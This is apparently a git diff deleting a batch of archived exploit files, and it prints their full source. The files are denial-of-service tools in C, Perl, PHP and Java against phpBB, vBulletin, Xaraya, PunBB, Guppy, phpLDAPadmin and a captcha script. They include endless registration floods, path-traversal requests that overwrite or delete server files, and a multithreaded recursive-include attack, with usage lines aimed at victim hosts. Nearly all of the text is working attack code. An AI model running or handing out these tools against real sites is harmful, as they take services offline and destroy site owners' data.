NeoSecurityTeam - [+] Dos has begun....[+] - - [*] Use: ./NsT-phpBBDoS - [*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com - root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com - [+] NsT-phpBBDoS v0.1 by HaCkZaTaN - [+] NeoSecurityTeam - [+] Dos has begun....[+] - - ................................. - root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created" - root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE - MACHTYPE=i486-slackware-linux-gnu - root@NeoSecurity:/home/hackzatan# - -*/ - -#include -#include -#include -#include -#ifdef WIN32 -#include -#pragma comment(lib, "ws2_32") -#pragma pack(1) -#define WIN32_LEAN_AND_MEAN -#else -#include -#include -#include -#include -#include -#include -#endif - -#define __USE_GNU -#define _XOPEN_SOURCE - -int Connection(char *, int); -void Write_In(int , char *, char *a, char *, int); -char Use(char *); - -int main(int argc, char *argv[]) -{ - int sock, x = 0; - char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3]; - - puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN"); - puts("[+] NeoSecurityTeam"); - puts("[+] Dos has begun....[+]\n"); - fflush(stdout); - - if(argc != 4) Use(argv[0]); - - while(1) - { - sock = Connection(Host,80); - Write_In(sock, Path, Pro_Sea, Host, x); - #ifndef WIN32 - shutdown(sock, SHUT_WR); - close(sock); - #else - closesocket(sock); - WSACleanup(); - #endif - Pro_Sea = argv[2]; - x++; - } - //I don't think that it will get here =) - - return 0; -} - -int Connection(char *Host, int Port) -{ - #ifndef WIN32 - #define SOCKET int - #else - int error; - WSADATA wsadata; - error = WSAStartup(MAKEWORD(2, 2), &wsadata); - - if (error == SOCKET_ERROR) - { - perror("Could Not Start Up Winsock!\n"); - return; - } - - #endif - - SOCKET sockfd; - struct sockaddr_in sin; - struct in_addr *myaddr; - struct hostent *h; - - if(Port <= 0 || Port > 65535) - { - puts("[-] Invalid Port Number\n"); - fflush(stdout); - exit(-1); - } - - if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) - { - perror("socket() "); - fflush (stdout); - exit(-1); - } - - if(isalpha(Host[0])) - { - if((h = gethostbyname(Host)) == NULL) - { - perror("gethostbyname() "); - fflush (stdout); - exit(-1); - } - } - else - { - myaddr=(struct in_addr*)malloc(sizeof(struct in_addr)); - myaddr->s_addr=inet_addr(Host); - - if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL) - { - perror("gethostbyaddr() "); - fflush (stdout); - exit(-1); - } - } - - memset(&sin, 0, sizeof(sin)); - sin.sin_family = AF_INET; - sin.sin_port = htons(Port); - memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length); - - if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0) - { - perror("connect() "); - exit (-1); - } - - return sockfd; -} - -void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x) -{ - char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ); - char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n" - "Accept: */*\r\n" - "Accept-Language: en-us\r\n" - "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" - "Accept encoding: gzip,deflate\r\n" - "Keep-Alive: 300\r\n" - "Proxy-Connection: keep-alive\r\n" - "Content-Type: application/x-www-form-urlencoded\r\n" - "Cache-Control: no-cache\r\n" - "Pragma: no-cache\r\n"; - char *Profile = "%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=1&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit\r\n"; - char *Search = "&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200\r\n"; - - if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=NsT__%d&email=NsT__%d%s", x, x, Profile); - else if(strcmp("search.php", Pro_Sea) == 0) - { - Pro_Sea = "search.php?mode=results"; - sprintf(str1, "search_keywords=Hack%d%s", x, Search); - } - else - { - puts("Sorry. Try making the right choice"); - exit(-1); - } - - sprintf(str2, "POST %s%s HTTP/1.1\r\n" - "Host: %s\r\n" - "Referer: http://%s/\r\n%s" - "Content-Length: %d\r\n\r\n%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1); - - write(sock, str2, strlen(str2)); - write(1, ".", 1); - fflush(stdout); -} - -char Use(char *program) -{ - fprintf(stderr,"[*] Use: %s \n", program); - fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com\n", program); - fflush(stdout); - exit(-1); -} - -/* - -@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ -'@@@@@''@@'@@@''''''''@@''@@@''@@ -'@@'@@@@@@''@@@@@@@@@'''''@@@ -'@@'''@@@@'''''''''@@@''''@@@ -@@@@''''@@'@@@@@@@@@@''''@@@@@ - -*/ - -// milw0rm.com [2005-06-22] diff --git a/platforms/php/webapps/11397.txt b/platforms/php/webapps/11397.txt deleted file mode 100755 index 385ccc729..000000000 --- a/platforms/php/webapps/11397.txt +++ /dev/null @@ -1,27 +0,0 @@ -# Exploit Title: CaptchaSecurityImages.php Denial Of Service -# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il -# Software Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php -# -##[Denial Of Service] -(OWASP: The Denial of Service (DoS) attack is focused on making unavailable a resource (site, application, server) for the purpose it was designed. There are many ways to make a service unavailable for legitimate users by manipulating network packets, programming, logical, or resources handling vulnerabilities, among others. If a service receives a very large number of requests, it may stop providing service to legitimate users. In the same way, a service may stop if a programming vulnerability is exploited, or the way the service handles resources used by it.) -# -#Exploit: -/CaptchaSecurityImages.php?width=13333337&height=13333337&characters=13333337 -# -# -The vuln code is: (lines 73-75) -# -$width = isset($_GET['width']) ? $_GET['width'] : '120'; -$height = isset($_GET['height']) ? $_GET['height'] : '40'; -$characters = isset($_GET['characters']) && $_GET['characters'] > 1 ? $_GET['characters'] : '6'; -# -To fix it- delete all the "$_GET[x]" strings and make it constant, like this: -# -$width=100; -$height=40; -$characters=5; -# -# -#[e0f] - - diff --git a/platforms/php/webapps/12186.pl b/platforms/php/webapps/12186.pl deleted file mode 100755 index 4c7753f89..000000000 --- a/platforms/php/webapps/12186.pl +++ /dev/null @@ -1,44 +0,0 @@ -# DOS Vbulletin 92% Works ;) -# -# Tested on all versions! and can DOS the server -# -#Perl Script -use Socket; -if (@ARGV < 2) { &usage } -$rand=rand(10); -$host = $ARGV[0]; -$dir = $ARGV[1]; -$host =~ s/(http:\/\/)//eg; -for ($i=0; $i<10; $i--) -{ -$user="vb".$rand.$i; -$data = "s=" -; -$len = length $data; -$foo = "POST ".$dir."index.php HTTP/1.1\r\n". -"Accept: */*\r\n". -"Accept-Language: en-gb\r\n". -"Content-Type: application/x-www-form-urlencoded\r\n". -"Accept-Encoding: gzip, deflate\r\n". -"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". -"Host: $host\r\n". -"Content-Length: $len\r\n". -"Connection: Keep-Alive\r\n". -"Cache-Control: no-cache\r\n\r\n". -"$data"; -my $port = "80"; -my $proto = getprotobyname('tcp'); -socket(SOCKET, PF_INET, SOCK_STREAM, $proto); -connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; -send(SOCKET,"$foo", 0); -syswrite STDOUT, "+" ; -} -print "\n\n"; -system('ping $host'); -sub usage { -print "\tusage: \n"; -print "\t$0 \n"; -print "\tex: $0 127.0.0.1 /forum/\n"; -print "\tex2: $0 127.0.0.1 /\n\n"; -exit(); -}; diff --git a/platforms/php/webapps/1345.php b/platforms/php/webapps/1345.php deleted file mode 100755 index 646086656..000000000 --- a/platforms/php/webapps/1345.php +++ /dev/null @@ -1,211 +0,0 @@ - ******** Xaraya <=1.0.0 rc4 Denial of Service ********* - -

-********** Xaraya <=1.0.0 rc4 Denial of Service ********

a -script by rgod at -http://rgod.altervista.org

* hostname (ex:www.sitename.com) -

* path (ex: -/xaraya/ or just / )

specify a port other than 80 ( default value )

-

send exploit -through an HTTP proxy (ip:port)

'; - - -function show($headeri) -{ -$ii=0; -$ji=0; -$ki=0; -$ci=0; -echo ''; -while ($ii <= strlen($headeri)-1) -{ -$datai=dechex(ord($headeri[$ii])); -if ($ji==16) { - $ji=0; - $ci++; - echo ""; - for ($li=0; $li<=15; $li++) - { echo ""; - } - $ki=$ki+16; - echo ""; - } -if (strlen($datai)==1) {echo "";} else -{echo " ";} -$ii++; -$ji++; -} -for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) - { echo ""; - } - -for ($li=$ci*16; $li<=strlen($headeri); $li++) - { echo ""; - } -echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; - -function sendpacket() //if you have sockets module loaded, 2x speed! if not,load - //next function to send packets -{ - global $proxy, $host, $port, $packet, $html, $proxy_regex; - $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); - if ($socket < 0) { - echo "socket_create() failed: reason: " . socket_strerror($socket) . "
"; - } - else - { $c = preg_match($proxy_regex,$proxy); - if (!$c) {echo 'Not a valid prozy...'; - die; - } - echo "OK.
"; - echo "Attempting to connect to ".$host." on port ".$port."...
"; - if ($proxy=='') - { - $result = socket_connect($socket, $host, $port); - } - else - { - - $parts =explode(':',$proxy); - echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; - $result = socket_connect($socket, $parts[0],$parts[1]); - } - if ($result < 0) { - echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "

"; - } - else - { - echo "OK.

"; - $html= ''; - socket_write($socket, $packet, strlen($packet)); - echo "Reading response:
"; - while ($out= socket_read($socket, 2048)) {$html.=$out;} - echo nl2br(htmlentities($html)); - echo "Closing socket..."; - socket_close($socket); - - } - } -} -function sendpacketii($packet) -{ -global $proxy, $host, $port, $html, $proxy_regex; -if ($proxy=='') - {$ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { echo 'No response from '.htmlentities($host); - die; } - } - else - { - $c = preg_match($proxy_regex,$proxy); - if (!$c) {echo 'Not a valid prozy...'; - die; - } - $parts=explode(':',$proxy); - echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { echo 'No response from proxy...'; - die; - } - } -fputs($ock,$packet); -if ($proxy=='') - { - - $html=''; - while (!feof($ock)) - { - $html.=fgets($ock); - } - } -else - { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) - { - $html.=fread($ock,1); - } - } -fclose($ock); -echo nl2br(htmlentities($html)); -} - -$host=$_POST[host];$path=$_POST[path]; -$port=$_POST[port];$proxy=$_POST[proxy]; - -if (($host<>'') and ($path<>'')) -{ - $port=intval(trim($port)); - if ($port=='') {$port=80;} - if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} - if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - $host=str_replace("\r\n","",$host); - $path=str_replace("\r\n","",$path); - - $KEYFILE=urlencode("../../../../.key.php"); //to create an empty key.php dir... - $HTACCESS=urlencode("../../../../../.htaccess"); //to create an empty .htaccess dir... - $CONFIGFILE=urlencode("../../../../config.system.php".CHR(0x00)); //overwrite configuration file with garbage - - $request[0]="index.php?module=".$KEYFILE; - $request[1]="index.php?module=".$HTACCESS; - $request[2]="index.php?module=".$CONFIGFILE; - $request[3]="index.php"; - - for($i=0; $i<=count($request)-1; $i++) - { - $packet="GET ".$p.$request[$i]." HTTP/1.1\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="User-Agent: Zoo Tycoon 2 Client\r\n"; - $packet.="Accept-Encoding: text/plain\r\n"; - $packet.="Connection: Close\r\n\r\n"; - show($packet); - sendpacketii($packet); - } - if (eregi('fatal error',$html)) {echo "Exploit succeeded...";} - else {echo "Exploit failed...";} - } -else - {echo "Fill * required fields, optionally specify a proxy";} -?> - -# milw0rm.com [2005-11-29] diff --git a/platforms/php/webapps/1517.c b/platforms/php/webapps/1517.c deleted file mode 100755 index 23ce866f5..000000000 --- a/platforms/php/webapps/1517.c +++ /dev/null @@ -1,176 +0,0 @@ -/* - Name: NST-Exploit Punbb 2.0.10 Denial Of Service - Copyright: NeoSecurity - Author: K4P0 - - [./]NST-XplPunbb www.victim.com 2.0.0.6 /punbb/ - - ################################################# - PunBB 2.0.10 Denial of Service exploit by K4P0 - Use only at your own reputation risk! ;) - - www.NeoSecurityTeam.net - ################################################# - - [1] - Trying if connection is possible... - [2] - Connected! - [3] - Flooding localhost... - - Use it at your own risk!. -*/ - -#define WINDOWS -//#define LINUX - -#include -#include -#include -#ifdef WINDOWS -#include -#include -// Link to (lib)ws2_32.a -#else -#include -#include -#include -#endif - -#define NST_ALIVE 1 - -int Connect(char*); -void SendPack(int, int, char*, char*); -void _perror(char*); -void HowTo(char*); - -int main(int argc, char* argv[]) -{ - int vict_sock, dos = 0; - puts("#################################################"); - puts(" PunBB 2.0.10 Denial of Service exploit by K4P0 "); - puts(" Use only at your own reputation risk! ;) \n"); - puts(" www.NeoSecurityTeam.net "); - if(argc < 4) HowTo(argv[0]); - puts("#################################################\n"); - - printf("[1] - Trying if connection is possible...\n", argv[1]); - fflush(stdout); - vict_sock = Connect(argv[2]); - printf("[2] - Connected!\n"); - printf("[3] - Flooding %s", argv[1]); - #ifdef WINDOWS - closesocket(vict_sock); - #else - close(vict_sock); - #endif - - while(NST_ALIVE) - { - if(!(dos % 10)) fprintf(stderr, "."); - vict_sock = Connect(argv[2]); - SendPack(vict_sock, dos, argv[3], argv[1]); - dos++; - #ifdef WINDOWS - closesocket(vict_sock); - WSACleanup(); - #else - close(vict_sock); - #endif - } - return 0; -} -// I'm to lazy to use gethostby(addr|name) :) -int Connect(char* IP) -{ - struct sockaddr_in *_addr; - int vict_sck; - - #ifdef WINDOWS - WSADATA wsaData; - if(WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) - { - //WSAGetLastError()? Nah... - fprintf(stderr, "[*] WSAStartup() failed"); - exit(-1); - } - #endif - - if(!(_addr=(struct sockaddr_in *)malloc(sizeof(struct sockaddr_in)))) - { - fprintf(stderr, "[*] Unable to reserve memory"); - exit(-1); - } - - memset(_addr, 0x0, sizeof(struct sockaddr_in)); - _addr->sin_family = AF_INET; - _addr->sin_port = htons(80); - _addr->sin_addr.s_addr = inet_addr(IP); - - #ifdef WINDOWS - if((vict_sck = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) - { - fprintf(stderr, "WSASocket() failed"); - exit(-1); - } - else - if((vict_sck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) - _perror("socket() "); - #endif - - if(connect(vict_sck, (struct sockaddr *)_addr, sizeof(struct sockaddr)) < 0) - _perror("connect() "); - - free(_addr); - return vict_sck; -} - -void SendPack(int v_sck, int var, char* path, char* DNS) -{ - char *HTTP_PACK, *HTTP_MPCK, *HTTP_POST; - if(!(HTTP_PACK = (char *)malloc(2048)) || !(HTTP_MPCK = (char *)malloc(1024)) || - !(HTTP_POST = (char *)malloc(512))) - { - fprintf(stderr, "Error trying to reserver memory"); - exit(-1); - } - sprintf(HTTP_PACK, "POST %sregister.php?action=register HTTP/1.1\n" - "Host: %s\n" - "User-Agent: Mozilla/5.0 Gecko/20050511 Firefox/1.0.4\n" - "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n" - "Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3\n" - "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n" - "Keep-Alive: 300\n" - "Proxy-Connection: keep-alive\n" - "Referer: http://%s%sregister.php\n" - "Content-Type: application/x-www-form-urlencoded\n", path, DNS, DNS, path); - - sprintf(HTTP_POST, "form_sent=1&req_username=%d__NsT&req_password1=flood&req_password2=flood&" - "req_email1=%d_peace@NsT.net&timezone=-10&email_setting=1", var, var); - - sprintf(HTTP_MPCK, "Content-Length: %d\n\n", strlen(HTTP_POST)); - - strcat(HTTP_PACK, HTTP_MPCK); - strcat(HTTP_PACK, HTTP_POST); - send(v_sck, HTTP_PACK, strlen(HTTP_PACK), 0); - - free(HTTP_PACK); - free(HTTP_MPCK); - free(HTTP_POST); - return; -} - -void _perror(char* msg) -{ - perror(msg); - fflush(stdout); - exit(-1); -} - -void HowTo(char* program) -{ - fprintf(stderr, "%s \n", program); - fprintf(stderr, "f.e: ./NsT-XplPunbb www.victim.com 2.0.0.6 /punbb/\n"); - fprintf(stderr, "#################################################"); - exit(0); -} - -// milw0rm.com [2006-02-20] diff --git a/platforms/php/webapps/1573.php b/platforms/php/webapps/1573.php deleted file mode 100755 index 9bbc7c608..000000000 --- a/platforms/php/webapps/1573.php +++ /dev/null @@ -1,232 +0,0 @@ -# Change line 30 s/htp/http if you would like to see the logo. /str0ke - - - - -Guppy <= 4.5.11 Remote DOS Exploit - - - - -

Guppy <= 4.5.11 Remote DOS -Exploit

-

by trueend5

-

Computer Security Science Researchers -Institute

- -

KAPDA

-

- - - - - - - -
-
-

* hostname (ex:www.sitename.com)

-

* path (ex: - /guppy/ - or just / )

-

how many document - do you want to destroy (default is 100)

-

  This option works when magic_quotes_gpc is Off

-

specify a port  - (default is 80)

-

send exploit - through an HTTP proxy (ip:port)

-

   - * fields are required

-

-----------------------------------------------------------------------------------------------

- -

-
-
-'; -function show($headeri) -{ - $ii=0;$ji=0;$ki=0;$ci=0; - echo ''; - while ($ii <= strlen($headeri)-1){ - $datai=dechex(ord($headeri[$ii])); - if ($ji==16) { - $ji=0; - $ci++; - echo ""; - for ($li=0; $li<=15; $li++) { - echo ""; - } - $ki=$ki+16; - echo ""; - } - if (strlen($datai)==1) { - echo ""; - } - else { - echo " "; - } - $ii++;$ji++; - } - for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { - echo ""; - } - for ($li=$ci*16; $li<=strlen($headeri); $li++) { - echo ""; - } - echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; -} - -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; - -function sendpacket() -{ - global $proxy, $host, $port, $packet, $html, $proxy_regex; - $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); - if ($socket < 0) { - echo "socket_create() failed: reason: " . socket_strerror($socket) . "
"; - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) {echo 'Not a valid proxy'; - die; - } - echo "OK.
"; - echo "Attempting to connect to ".$host." on port ".$port."...
"; - if ($proxy=='') { - $result = socket_connect($socket, $host, $port); - } - else { - $parts =explode(':',$proxy); - echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; - $result = socket_connect($socket, $parts[0],$parts[1]); - } - if ($result < 0) { - echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "

"; - } - else { - echo "OK.

"; - $html= ''; - socket_write($socket, $packet, strlen($packet)); - echo "Reading response:
"; - while ($out= socket_read($socket, 2048)) {$html.=$out;} - echo nl2br(htmlentities($html)); - echo "Closing socket..."; - socket_close($socket); - } - } -} - -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.htmlentities($host); die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy';die; - } - $parts=explode(':',$proxy); - echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); -} - -$host=$_POST[host]; -$path=$_POST[path]; -$port=$_POST[port]; -$num=$_POST[num]; - -if (($host<>'') and ($path<>'')) -{ - $port=intval(trim($port)); - $num=intval(trim($num)); - if ($port=='') {$port=80;} - if ($num=='') {$num=100;} - if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');} - if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - $host=str_replace("\r\n","",$host); - $path=str_replace("\r\n","",$path); - echo ' Try to see if magic_quotes_gpc is enable! ...'; - $packet="GET ".$p."mobile/dwnld.php?pg=./%2E./test.inc%00"." HTTP/1.1\r\n"; - $packet.="User-Agent: Shareaza v1.x.x.xx\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - show($packet); - sendpacketii($packet); - $test='http://'.$host.$path.'data/test.inc'; - if (!include("$test")) { - echo'It seems magic_quotes_gpc is On. Trying STEP 2 ...'; -} - else {echo'magic_quotes_gpc is disable. STEP 1:'; - for ($n = 1; $n <= $num; $n++) { - $packet="GET ".$p."mobile/dwnld.php?pg=./%2E./doc".$n.".inc%00"." HTTP/1.1\r\n"; - $packet.="User-Agent: Shareaza v1.x.x.xx\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - show($packet); - sendpacketii($packet); - } -} - echo' STEP 2:'; - for ($n = 1; $n <= 29; $n++) { - if ($n==1) {$str='ar';} if ($n==2) {$str='counter';} if ($n==3) {$str='dn';} if ($n==4) {$str='docid';} if ($n==5) {$str='fa';} - if ($n==6) {$str='fr';} if ($n==7) {$str='frcat';} if ($n==8) {$str='frcount';} if ($n==9) {$str='frth';} if ($n==10) {$str='ippoll';} - if ($n==11) {$str='ipstats';} if ($n==12) {$str='li';} if ($n==13) {$str='log_date';} if ($n==14) {$str='log_files';} - if ($n==15) {$str='log_stats';} if ($n==16) {$str='logbook';} if ($n==17) {$str='logd';} if ($n==18) {$str='logh';} - if ($n==19) {$str='logm';} if ($n==20) {$str='logp';} if ($n==21) {$str='logy';} if ($n==22) {$str='nextid';} - if ($n==23) {$str='nwlist';} if ($n==24) {$str='ph';} if ($n==25) {$str='poll';} if ($n==26) {$str='ra';} - if ($n==27) {$str='rs';} if ($n==28) {$str='stats';} if ($n==29) {$str='statsbk';} - $packet="GET ".$p."mobile/dwnld.php?pg=./%2E./$str"." HTTP/1.1\r\n"; - $packet.="User-Agent: SnoopRob/x.x\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - show($packet); - sendpacketii($packet); - } - $test2='http://'.$host.$path.'data/stats.dtb'; - include("$test2"); - if (eregi("1",$html)) {echo "Exploit succeeded"; } - else {echo "Exploit failed...";} -} -else -{echo "IMPORTANT NOTICE: This POC is just for educational purposes, Please Do not use it against external websites
-You are responsible for any damage that .... ";} - -?> - -# milw0rm.com [2006-03-10] diff --git a/platforms/php/webapps/1651.php b/platforms/php/webapps/1651.php deleted file mode 100755 index 1f664cdb9..000000000 --- a/platforms/php/webapps/1651.php +++ /dev/null @@ -1,107 +0,0 @@ -#!/usr/bin/php -q -d short_open_tag=on - 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port."\r\n"; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...'; - } - } - fputs($ock,$packet); - fclose($ock); -} - -$host=$argv[1];$path=$argv[2];$redo=$argv[3]; -$port=80;$proxy=""; -for ($i=4; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -for ($i=1; $i<=$redo; $i++) -{ -$packet ="GET ".$p."include/adodb/tests/tmssql.php?do=closelog HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -echo $packet; -} -?> - -# milw0rm.com [2006-04-09] diff --git a/platforms/php/webapps/18023.java b/platforms/php/webapps/18023.java deleted file mode 100755 index 671723a6c..000000000 --- a/platforms/php/webapps/18023.java +++ /dev/null @@ -1,138 +0,0 @@ -/** - * Exploit Title: phpLDAPadmin 0.9.4b DoS - * Google Dork: "phpLDAPadmin - 0.9.4b" - * Date: 2011-10-23 - * Author: Alguien - * Software Link: http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin/0.9.4b/ - * Version: 0.9.4b - * Tested on: Red Hat - * CVE : - - * - * Compilation: - * ------------ - * $ javac phpldos.java - * - * Usage: - * ------ - * $ java phpldos - * - * Example: - * -------- - * $ java phpldos www.example.com /phpldapadmin/ 10 - * - * Explanation: - * ------------ - * The file "common.php" is vulnerable to LFI through the "Accept-Language" - * HTTP header. - * - * if( isset( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) { - * // get the languages which are spetcified in the HTTP header - * $HTTP_LANGS1 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] ); - * $HTTP_LANGS2 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] ); - * foreach( $HTTP_LANGS2 as $key => $value ) { - * $value=preg_split ("/[-]+/", $value ); - * $HTTP_LANGS2[$key]=$value[0]; - * } - * - * $HTTP_LANGS = array_merge ($HTTP_LANGS1, $HTTP_LANGS2); - * foreach( $HTTP_LANGS as $HTTP_LANG) { - * // try to grab one after the other the language file - * if( file_exists( realpath( "lang/recoded/$HTTP_LANG.php" ) ) && - * is_readable( realpath( "lang/recoded/$HTTP_LANG.php" ) ) ) { - * ob_start(); - * include realpath( "lang/recoded/$HTTP_LANG.php" ); - * ob_end_clean(); - * break; - * } - * } - * } - * - * This exploit sends "../../common" in the Accept-Language header in order to - * generate a recursive inclusions and cause a denial of service via resource - * exhaustion. - * - * GET /phpldapadmin/common.php HTTP/1.1\r\n - * Host: www.example.com\r\n - * Accept-Language: ../../common\r\n - * Connection: close\r\n - * \r\n - * - */ -import java.io.PrintStream; -import java.net.InetSocketAddress; -import java.net.Socket; - -class phpldos implements Runnable { - - public static final int HTTP_PORT = 80; - public static final int TIMEOUT = 10000; - private static String host; - private static String path; - private Socket sk; - private PrintStream ps; - - public void run() { - while (true) { - if (!open_connection()) { - System.out.println("[+] Mission complete. Server is down };]"); - break; - } - send_attack(); - try { - ps.close(); - sk.close(); - } catch (Exception e) { - // D'oh! - } - } - } - - private boolean open_connection() { - try { - sk = new Socket(); - sk.connect(new InetSocketAddress(host, HTTP_PORT), TIMEOUT); - ps = new PrintStream(sk.getOutputStream()); - } catch (Exception e) { - return false; - } - return true; - } - - private void send_attack() { - try { - String message = "" - + "GET " + path + "common.php HTTP/1.1\r\n" - + "Host: " + host + "\r\n" - + "Accept-Language: ../../common\r\n" - + "Connection: close\r\n" - + "\r\n"; - ps.print(message); - } catch (Exception e) { - // D'oh! - } - } - - public static void main(String[] args) { - if (args.length != 3) { - usage(); - } - host = args[0]; - path = args[1]; - int threads = Integer.parseInt(args[2]); - System.out.println("[+] Attacking with " + threads + " threads."); - for (int i = 0; i < threads; i++) { - new Thread(new phpldos()).start(); - } - } - - public static void usage() { - System.out.print( - "###########################################################\n" - + "# phpLDAPadmin DoS #\n" - + "# by: Alguien - http://alguienenlafisi.blogspot.com #\n" - + "###########################################################\n" - + "Syntax : java phpldos \n" - + "Example : java phpldos www.example.com /phpldapadmin/ 10\n\n"); - System.exit(1); - } -} diff --git a/platforms/php/webapps/21428.txt b/platforms/php/webapps/21428.txt deleted file mode 100755 index 049dd0691..000000000 --- a/platforms/php/webapps/21428.txt +++ /dev/null @@ -1,12 +0,0 @@ -source: http://www.securityfocus.com/bid/4635/info - -Messagerie is a web message board application maintained by La Basse. - -An issue has been discovered in Messagerie, which could allow an attacker to delete arbitrary user accounts. 